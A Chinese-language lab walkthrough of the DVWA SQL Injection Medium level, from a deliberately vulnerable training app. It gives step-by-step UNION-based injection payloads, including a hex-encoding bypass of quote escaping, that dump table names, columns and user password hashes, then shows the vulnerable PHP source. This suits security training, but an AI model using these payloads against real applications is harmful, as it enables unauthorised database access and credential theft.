DVWA--SQL注入(SQL Injection)--Medium

DVWA--SQL注入(SQL Injection)--Low

目錄

級別：Medium

 1、查看POST請求

2、hackbar提交POST請求

3、輸入'，報錯，判斷爲數字型注入

4、猜測SQL查詢的字段數

5、確定回顯的位置

6、獲取當前數據庫及版本信息

7、獲取數據庫中表信息（group_concat()）

8、獲取表字段

9、獲取用戶信息

10、密文解碼

後臺源碼

---

級別：Medium

Medium級別的代碼利用mysql_real_escape_string函數對特殊符號\x00,\n,\r,,’,”,\x1a進行轉義，同時前端頁面設置了下拉選擇表單，希望以此來控制用戶的輸入。雖然前端使用了下拉選擇菜單，但我們依然可以通過抓包改參數，提交惡意構造的查詢參數。所以就用到了抓包軟件burpsuite以及服務器的代理設置。

 1、查看POST請求

2、hackbar提交POST請求

切換到hackbar-->Load URL-->Post Data輸入id=3&Submit=Submit

3、輸入'，報錯，判斷爲數字型注入

4、猜測SQL查詢的字段數

由下面結果可知，SQL查詢結果字段數爲2

id=1 order by 2 &Submit=Submit        #查詢成功
id=1 order by 4 &Submit=Submit        #查詢失敗
id=1 order by 3 &Submit=Submit        #查詢失敗

5、確定回顯的位置

id=1 union select 1,2 &Submit=Submit

6、獲取當前數據庫及版本信息

id=1 and 1=2 union select database(),version() &Submit=Submit

7、獲取數據庫中表信息（group_concat()）

id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() &Submit=Submit

8、獲取表字段

因爲單引號會被轉義，故需要繞過轉義，可使用16進制繞過

字符串-十六進制轉換：https://zixuephp.net/tool-str-hex.html

id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users' &Submit=Submit

因單引號被轉義報錯：
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\'users\'' at line 1

id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 # &Submit=Submit

9、獲取用戶信息

id=1 and 1=2 union select user,password from users # &Submit=Submit

10、密文解碼

CMD5解碼

後臺源碼

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Display values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>